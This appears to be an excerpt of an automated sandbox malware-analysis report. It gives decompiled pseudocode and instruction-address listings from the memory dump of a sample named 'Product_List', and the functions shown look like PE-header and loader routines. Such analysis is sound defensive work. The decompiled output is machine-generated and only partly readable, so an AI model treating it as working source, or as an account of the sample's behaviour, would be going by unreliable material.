										_t208 = E01816B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01816AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0177E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0177EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = L017A9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0177E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01778F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - L017A3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                      0x0177d5f2
                                                      0x0177d5f5
                                                      0x0177d5f5
                                                      0x0177d5fd
                                                      0x0177d600
                                                      0x0177d60a
                                                      0x0177d60d
                                                      0x0177d617
                                                      0x0177d61d
                                                      0x0177d627
                                                      0x0177d62e
                                                      0x0177d911
                                                      0x0177d913
                                                      0x00000000
                                                      0x0177d919
                                                      0x0177d919
                                                      0x0177d919
                                                      0x0177d634
                                                      0x0177d634
                                                      0x0177d634
                                                      0x0177d634
                                                      0x0177d640
                                                      0x0177d8bf
                                                      0x00000000
                                                      0x0177d646
                                                      0x0177d646
                                                      0x0177d64d
                                                      0x0177d652
                                                      0x017cb2fc
                                                      0x017cb2fc
                                                      0x017cb302
                                                      0x017cb33b
                                                      0x017cb341
                                                      0x00000000
                                                      0x017cb304
                                                      0x017cb304
                                                      0x017cb319
                                                      0x017cb31e
                                                      0x017cb324
                                                      0x017cb326
                                                      0x017cb332
                                                      0x017cb347
                                                      0x017cb34c
                                                      0x017cb351
                                                      0x017cb35a
                                                      0x00000000
                                                      0x017cb328
                                                      0x017cb328
                                                      0x00000000
                                                      0x017cb328
                                                      0x017cb326
                                                      0x0177d658
                                                      0x0177d658
                                                      0x0177d65b
                                                      0x0177d665
                                                      0x00000000
                                                      0x0177d66b
                                                      0x0177d66b
                                                      0x0177d66b
                                                      0x0177d66b
                                                      0x0177d66d
                                                      0x0177d672
                                                      0x0177d67a
                                                      0x00000000
                                                      0x00000000
                                                      0x0177d680
                                                      0x0177d686
                                                      0x0177d8ce
                                                      0x0177d8d4
                                                      0x0177d8dd
                                                      0x0177d8e0
                                                      0x0177d68c
                                                      0x0177d691
                                                      0x0177d69d
                                                      0x0177d6a2
                                                      0x0177d6a7
                                                      0x0177d6b0
                                                      0x0177d6b5
                                                      0x0177d6e0
                                                      0x0177d6b7
                                                      0x0177d6b7
                                                      0x0177d6b9
                                                      0x0177d6b9
                                                      0x0177d6bb
                                                      0x0177d6bd
                                                      0x0177d6ce
                                                      0x0177d6d0
                                                      0x0177d6d2
                                                      0x017cb363
                                                      0x017cb365
                                                      0x00000000
                                                      0x017cb36b
                                                      0x00000000
                                                      0x017cb36b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0177d6bf
                                                      0x0177d6bf
                                                      0x0177d6e5
                                                      0x0177d6e7
                                                      0x0177d6e9
                                                      0x0177d6ec
                                                      0x0177d6ec
                                                      0x0177d6ef
                                                      0x0177d6f5
                                                      0x0177d6f9
                                                      0x0177d6fb
                                                      0x0177d6fd
                                                      0x0177d701
                                                      0x0177d703
                                                      0x0177d70a
                                                      0x0177d70a
                                                      0x0177d701
                                                      0x0177d710
                                                      0x0177d710
                                                      0x0177d6c1
                                                      0x0177d6c1
                                                      0x0177d6c6
                                                      0x017cb36d
                                                      0x017cb36f
                                                      0x00000000
                                                      0x017cb375
                                                      0x017cb375
                                                      0x017cb375
                                                      0x00000000
                                                      0x017cb375
                                                      0x00000000
                                                      0x0177d6cc
                                                      0x0177d6d8
                                                      0x0177d6d8
                                                      0x0177d6d8
                                                      0x00000000
                                                      0x0177d6c6
                                                      0x0177d6bf
                                                      0x00000000
                                                      0x0177d6da
                                                      0x0177d6da
                                                      0x0177d716
                                                      0x0177d71b
                                                      0x0177d720
                                                      0x0177d726
                                                      0x0177d726
                                                      0x0177d72d
                                                      0x00000000
                                                      0x0177d733
                                                      0x0177d739
                                                      0x0177d742
                                                      0x0177d750
                                                      0x0177d758
                                                      0x0177d764
                                                      0x0177d776
                                                      0x0177d77a
                                                      0x0177d783
                                                      0x0177d928
                                                      0x0177d92c
                                                      0x0177d93d
                                                      0x0177d944
                                                      0x0177d94f
                                                      0x0177d954
                                                      0x0177d956
                                                      0x0177d95f
                                                      0x0177d961
                                                      0x0177d973
                                                      0x0177d973
                                                      0x0177d956
                                                      0x0177d944
                                                      0x0177d92c
                                                      0x0177d78b
                                                      0x017cb394
                                                      0x0177d791
                                                      0x0177d798
                                                      0x017cb3a3
                                                      0x017cb3bb
                                                      0x017cb3bb
                                                      0x0177d7a5
                                                      0x0177d866
                                                      0x0177d870
                                                      0x0177d892
                                                      0x0177d898
                                                      0x0177d89e
                                                      0x0177d8a0
                                                      0x0177d8a6
                                                      0x0177d8ac
                                                      0x0177d8ae
                                                      0x0177d8b4
                                                      0x0177d8b4
                                                      0x0177d8ae
                                                      0x0177d7a5
                                                      0x0177d78b
                                                      0x0177d7b1
                                                      0x017cb3c5
                                                      0x017cb3c5
                                                      0x0177d7c3
                                                      0x0177d7ca
                                                      0x0177d7e5
                                                      0x0177d7eb
                                                      0x0177d8eb
                                                      0x0177d8ed
                                                      0x00000000
                                                      0x0177d8f3
                                                      0x0177d8f3
                                                      0x0177d8f3
                                                      0x00000000
                                                      0x0177d8ed
                                                      0x0177d7cc
                                                      0x0177d7cc
                                                      0x0177d7d2
                                                      0x00000000
                                                      0x0177d7d4
                                                      0x0177d7d4
                                                      0x0177d7d7
                                                      0x0177d7df
                                                      0x017cb3d4
                                                      0x017cb3d9
                                                      0x017cb3dc
                                                      0x017cb3dc
                                                      0x017cb3df
                                                      0x017cb3e2
                                                      0x017cb468
                                                      0x017cb46d
                                                      0x017cb46f
                                                      0x017cb46f
                                                      0x017cb475
                                                      0x0177d8f8
                                                      0x0177d8f9
                                                      0x0177d8fd
                                                      0x017cb3e8
                                                      0x017cb3e8
                                                      0x017cb3eb
                                                      0x017cb3ed
                                                      0x00000000
                                                      0x017cb3ef
                                                      0x017cb3ef
                                                      0x017cb3f1
                                                      0x017cb3f4
                                                      0x017cb3fe
                                                      0x017cb404
                                                      0x017cb409
                                                      0x017cb40e
                                                      0x017cb410
                                                      0x017cb410
                                                      0x017cb414
                                                      0x017cb414
                                                      0x017cb41b
                                                      0x017cb420
                                                      0x017cb423
                                                      0x017cb425
                                                      0x017cb427
                                                      0x017cb42a
                                                      0x017cb42d
                                                      0x017cb42d
                                                      0x017cb42a
                                                      0x017cb432
                                                      0x017cb436
                                                      0x017cb438
                                                      0x017cb43b
                                                      0x017cb43b
                                                      0x017cb449
                                                      0x017cb44e
                                                      0x017cb454
                                                      0x017cb458
                                                      0x017cb458
                                                      0x017cb45d
                                                      0x00000000
                                                      0x017cb45d
                                                      0x017cb3ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0177d7df
                                                      0x0177d7d2
                                                      0x0177d7ca
                                                      0x017cb37c
                                                      0x017cb37e
                                                      0x017cb385
                                                      0x017cb38a
                                                      0x00000000
                                                      0x017cb38a
                                                      0x0177d742
                                                      0x0177d7f1
                                                      0x0177d7f8
                                                      0x017cb49b
                                                      0x017cb49b
                                                      0x0177d800
                                                      0x0177d837
                                                      0x0177d843
                                                      0x0177d845
                                                      0x0177d847
                                                      0x0177d84a
                                                      0x0177d84b
                                                      0x0177d84e
                                                      0x0177d857
                                                      0x0177d818
                                                      0x0177d824
                                                      0x0177d831
                                                      0x017cb4a5
                                                      0x017cb4ab
                                                      0x017cb4b3
                                                      0x017cb4b8
                                                      0x017cb4bb
                                                      0x00000000
                                                      0x017cb4c1
                                                      0x017cb4c1
                                                      0x017cb4c8
                                                      0x00000000
                                                      0x017cb4ce
                                                      0x017cb4d4
                                                      0x017cb4e1
                                                      0x017cb4e3
                                                      0x017cb4e5
                                                      0x00000000
                                                      0x017cb4eb
                                                      0x017cb4f0
                                                      0x017cb4f2
                                                      0x0177dac9
                                                      0x0177dacc
                                                      0x0177dacf
                                                      0x0177dad1
                                                      0x0177dd78
                                                      0x0177dd78
                                                      0x0177dcf2
                                                      0x00000000
                                                      0x0177dad7
                                                      0x0177dad9
                                                      0x0177dadb
                                                      0x00000000
                                                      0x00000000
                                                      0x0177dae1
                                                      0x0177dae1
                                                      0x0177dae4
                                                      0x0177dae6
                                                      0x017cb4f9
                                                      0x017cb4f9
                                                      0x017cb500
                                                      0x0177daec
                                                      0x0177daec
                                                      0x0177daf5
                                                      0x0177daf8
                                                      0x0177dafb
                                                      0x0177db03
                                                      0x0177db11
                                                      0x0177db16
                                                      0x0177db19
                                                      0x0177db1b
                                                      0x017cb52c
                                                      0x017cb531
                                                      0x017cb534
                                                      0x0177db21
                                                      0x0177db21
                                                      0x0177db24
                                                      0x0177dcd9
                                                      0x0177dce2
                                                      0x0177dce5
                                                      0x0177dd6a
                                                      0x0177dd6d
                                                      0x00000000
                                                      0x0177dd73
                                                      0x017cb51a
                                                      0x017cb51c
                                                      0x017cb51f
                                                      0x017cb524
                                                      0x00000000
                                                      0x017cb524
                                                      0x0177dce7
                                                      0x0177dce7
                                                      0x0177dce7
                                                      0x00000000
                                                      0x0177dce7
                                                      0x00000000
                                                      0x0177db2a
                                                      0x0177db2c
                                                      0x0177db31
                                                      0x0177db33
                                                      0x0177db36
                                                      0x0177db39
                                                      0x0177db3b
                                                      0x0177db66
                                                      0x0177db66
                                                      0x0177db3d
                                                      0x0177db3d
                                                      0x0177db3e
                                                      0x0177db46
                                                      0x0177db47
                                                      0x0177db49
                                                      0x0177db4c
                                                      0x0177db53
                                                      0x0177db55
                                                      0x0177db58
                                                      0x0177db5a
                                                      0x017cb50a
                                                      0x017cb50f
                                                      0x017cb512
                                                      0x0177db60
                                                      0x0177db60
                                                      0x0177db63
                                                      0x0177db63
                                                      0x00000000
                                                      0x0177db63
                                                      0x0177db5a
                                                      0x0177db3b
                                                      0x0177db24
                                                      0x0177db69
                                                      0x0177db69
                                                      0x0177db6c
                                                      0x0177db6f
                                                      0x0177db74
                                                      0x017cb557
                                                      0x017cb557
                                                      0x017cb55e
                                                      0x0177db7a
                                                      0x0177db7c
                                                      0x0177db7f
                                                      0x0177db82
                                                      0x0177db85
                                                      0x00000000
                                                      0x0177db8b
                                                      0x0177db8b
                                                      0x0177db8d
                                                      0x0177db9b
                                                      0x0177db9b
                                                      0x0177db9d
                                                      0x0177dba0
                                                      0x0177dba2
                                                      0x0177dba4
                                                      0x0177dba7
                                                      0x0177dba9
                                                      0x0177dbae
                                                      0x0177dbae
                                                      0x0177dbb1
                                                      0x0177dbb4
                                                      0x0177dbb4
                                                      0x0177dbb7
                                                      0x0177dbba
                                                      0x0177dcd2
                                                      0x0177dcd4
                                                      0x00000000
                                                      0x0177dbc0
                                                      0x0177dbc0
                                                      0x0177dbd2
                                                      0x0177dbd7
                                                      0x0177dbda
                                                      0x0177dbdd
                                                      0x0177dbdf
                                                      0x00000000
                                                      0x0177dbe5
                                                      0x0177dbe5
                                                      0x0177dbee
                                                      0x0177dbf1
                                                      0x017cb541
                                                      0x017cb544
                                                      0x00000000
                                                      0x017cb546
                                                      0x017cb546
                                                      0x00000000
                                                      0x017cb546
                                                      0x0177dbf7
                                                      0x0177dbf7
                                                      0x0177dbfd
                                                      0x0177dbfd
                                                      0x0177dbff
                                                      0x0177dc0b
                                                      0x0177dc15
                                                      0x0177dc1b
                                                      0x0177dc1d
                                                      0x0177dc21
                                                      0x0177dc21
                                                      0x0177dc23
                                                      0x0177dc23
                                                      0x0177dc26
                                                      0x0177dc29
                                                      0x0177dc2b
                                                      0x00000000
                                                      0x00000000
                                                      0x0177dc31
                                                      0x0177dc34
                                                      0x0177dc36
                                                      0x0177dcbf
                                                      0x0177dcbf
                                                      0x0177dcc2
                                                      0x00000000
                                                      0x0177dc3c
                                                      0x0177dc41
                                                      0x0177dc43
                                                      0x00000000
                                                      0x0177dc45
                                                      0x0177dc45
                                                      0x0177dc47
                                                      0x00000000
                                                      0x0177dc4d
                                                      0x0177dc4d
                                                      0x0177dc50
                                                      0x0177dc52
                                                      0x0177dc55
                                                      0x0177dcfa
                                                      0x0177dcfe
                                                      0x0177dd08
                                                      0x0177dd0a
                                                      0x0177dd0c
                                                      0x00000000
                                                      0x0177dd12
                                                      0x0177dd15
                                                      0x0177dd2d
                                                      0x0177dd2f
                                                      0x0177dd32
                                                      0x0177dd35
                                                      0x00000000
                                                      0x0177dd35
                                                      0x0177dc5b
                                                      0x0177dc5b
                                                      0x0177dc5e
                                                      0x0177dc61
                                                      0x0177dc64
                                                      0x0177dc67
                                                      0x0177dc67
                                                      0x0177dc6a
                                                      0x0177dc6c
                                                      0x0177dc8e
                                                      0x0177dc8e
                                                      0x0177dc91
                                                      0x0177dc93
                                                      0x0177dcce
                                                      0x0177dcce
                                                      0x0177dc95
                                                      0x0177dc9c
                                                      0x0177dc6e
                                                      0x0177dc72
                                                      0x0177dc75
                                                      0x0177dc77
                                                      0x0177dc79
                                                      0x017cb551
                                                      0x017cb551
                                                      0x00000000
                                                      0x0177dc7f
                                                      0x0177dc7f
                                                      0x0177dc81
                                                      0x00000000
                                                      0x0177dc83
                                                      0x0177dc86
                                                      0x0177dc88
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0177dc88
                                                      0x0177dc81
                                                      0x0177dc79
                                                      0x0177dc6c
                                                      0x0177dc55
                                                      0x0177dc47
                                                      0x0177dc43
                                                      0x00000000
                                                      0x0177dc36
                                                      0x0177dc23
                                                      0x00000000
                                                      0x0177dbff
                                                      0x0177dbf1
                                                      0x0177dbdf
                                                      0x0177db8f
                                                      0x0177db92
                                                      0x0177db95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0177db95
                                                      0x0177db8d
                                                      0x0177db85
                                                      0x0177db74
                                                      0x0177dc9f
                                                      0x0177dca2
                                                      0x0177dcb0
                                                      0x0177dcb0
                                                      0x0177dad1
                                                      0x017cb4e5
                                                      0x017cb4c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0177d831
                                                      0x00000000
                                                      0x0177d800
                                                      0x017cb47f
                                                      0x017cb485
                                                      0x00000000
                                                      0x017cb485
                                                      0x0177d665
                                                      0x0177d652
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0945abf52bff4dcf188c9a377dd82aa91ab4930e0ad2eedee394e43b01c49a0b
                                                      • Instruction ID: d935a5a7cd847376e4aae7233fc80c7dfe67dce18396d25ccc0aa0d56f9662c4
                                                      • Opcode Fuzzy Hash: 0945abf52bff4dcf188c9a377dd82aa91ab4930e0ad2eedee394e43b01c49a0b
                                                      • Instruction Fuzzy Hash: E0E1CF30A0035A8FEF359B68C884B69FBB2BF85744F0401EDE90997295D774AA81CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179513A Relevance: .3, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E0179513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x185d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E017AD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01782280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01784620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E017AF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								L0177FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x185b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return L017AB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                      0x01795142
                                                      0x0179514c
                                                      0x01795150
                                                      0x01795157
                                                      0x01795159
                                                      0x0179515e
                                                      0x01795165
                                                      0x01795169
                                                      0x0179516c
                                                      0x01795172
                                                      0x01795176
                                                      0x0179517a
                                                      0x0179517a
                                                      0x0179517a
                                                      0x0179517f
                                                      0x017d6d8b
                                                      0x017d6d8e
                                                      0x017d6d91
                                                      0x017d6d95
                                                      0x017d6d98
                                                      0x017d6d9c
                                                      0x017d6da0
                                                      0x017d6da3
                                                      0x017d6da7
                                                      0x017d6e26
                                                      0x017d6e26
                                                      0x017d6e2a
                                                      0x017951f9
                                                      0x017951f9
                                                      0x017951fe
                                                      0x017d6e33
                                                      0x017d6e33
                                                      0x017d6e39
                                                      0x017d6e3d
                                                      0x017d6e46
                                                      0x017d6e50
                                                      0x00000000
                                                      0x00000000
                                                      0x017d6e52
                                                      0x017d6e53
